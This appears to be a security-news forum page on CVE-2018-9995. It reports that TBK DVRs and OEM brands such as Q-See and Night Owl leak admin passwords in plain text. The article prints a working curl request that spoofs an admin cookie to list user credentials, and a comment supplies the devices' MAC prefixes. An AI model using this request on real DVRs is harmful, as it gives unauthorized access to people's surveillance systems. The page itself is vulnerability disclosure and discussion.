Exploit Provides Plain Text Credentials For TBK, Q-See, Night Owl, And Other DVRs
A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is is outlined in CVE-2018-9995.
The DVRs affected are manufacturer by TBK as well as OEM'd by:
- CeNova
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- Novo
- Pulnix
- QSee
- Securus
- XVR 5 in 1
The exploit, tested by IPVM, is a simple CURL command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).
The plain text credentials returned from this command granted admin access to the device.
opt=user&cmd=list
Obviously they really tried hard to hide this backdoor ;)
Do they have a businesses presence in the US?
TBK is Spanish company, however OEMs like Q-see and Night Owl can be found at big box retailers in the US like Best Buy, Home Depot, Walmart, Coscto, and more.
John,
Q-See is OEMing TVT and Dahua, at least for the past few years.
Night Owl is HIkvision and Raysharp for the past few years as well.
I would be interested to see the models from TBK for these brands.
There are ~1.5k vulnerable units online in the US, out of ~55k total vulnerable units online worldwide.
The VR4104 and DVR4216 series from TBK are vulnerable. I am not sure what those model numbers are at the OEMs, but will look into it and report back here with anything I find.
Vulnerable Q-See Login:
Vulnerable Night Owl Login:
05/03/18 08:31pm
Has anyone created a map for vulnerable devices, similar to the Hikvision one (IIRC)? You could knock on some doors of people who have these kits and say, would you mind if I show you how insecure your camera system is? If they say yes, show them the vuln and offer to correct the issues. Someone could make a business out of doing just that for all of the vulnerabilities we see here.
Does anyone have the MAC prefix for their devices?
Sean - Here is a list of the affected brands and the associated OUIs:
Brands
TBK
CeNova
DVR Login
HVR Login
MDVR Login
Night OWL
Novo
Pulnix
QSee
Securus
XVR 5 in 1
OUIs:
00:06:1B
00:0C:DF
00:12:DF
00:12:FE
00:14:65
00:27:1A
00:59:07
08:A5:C8
0C:CB:85
14:1A:A3
14:30:C6
14:36:C6
14:9F:E8
1C:56:FE
1C:AB:01
20:76:93
24:DA:9B
30:4B:07
34:BB:26
38:80:DF
40:5A:9B
40:78:6A
40:88:05
44:80:EB
50:3C:C4
54:2B:57
54:C5:7A
5C:51:88
60:31:3B
60:99:D1
60:BE:B5
60:D2:1C
60:D9:A0
68:C4:4D
6C:5F:1C
70:72:0D
74:04:2B
74:AE:76
80:58:F8
80:6C:1B
80:CF:41
84:10:0D
88:6B:44
88:70:8C
88:79:7E
88:B4:A6
90:68:C3
98:FF:D0
9C:D9:17
A0:32:99
A4:70:D6
A4:8C:DB
A8:96:75
AC:38:70
B0:79:94
BC:FF:EB
C8:DD:C9
CC:07:E4
CC:61:E5
CC:C3:EA
D0:04:01
D0:77:14
D4:22:3F
D4:63:C6
D8:71:57
DC:BF:E9
E0:0B:28
E0:2C:B2
E0:75:7D
E0:98:61
E4:90:7E
E8:91:20
EC:88:92
EC:89:F5
F0:D7:AA
F4:F1:E1
F4:F5:24
F8:CF:C5
F8:E0:79
F8:F1:B6
05/10/18 08:06pm
Manufactured by TBK, a spanish company? Are they really manufactured in a spanish country?
Those dvr’s were designed and manufactured by Streamax, China.
IPVMU Certified | | 03/05/19 07:04am
This is correct. TBK is actually just a TVT OEM.
Newest Discussions
| Discussion | Posts | Latest |
|---|---|---|
|
Started by
Undisclosed Integrator #1
|
47
|
less than a minute by Undisclosed Integrator #10 |
|
Started by
Undisclosed Integrator #1
|
1
|
less than a minute by Undisclosed Integrator #1 |
|
Started by
Joern Windler
|
9
|
about 2 hours by Chris Lanier |
|
Started by
Donald Maye
|
211
|
less than a minute by Donald Maye |
|
Started by
Tien Phong
|
1
|
2 minutes by Tien Phong |
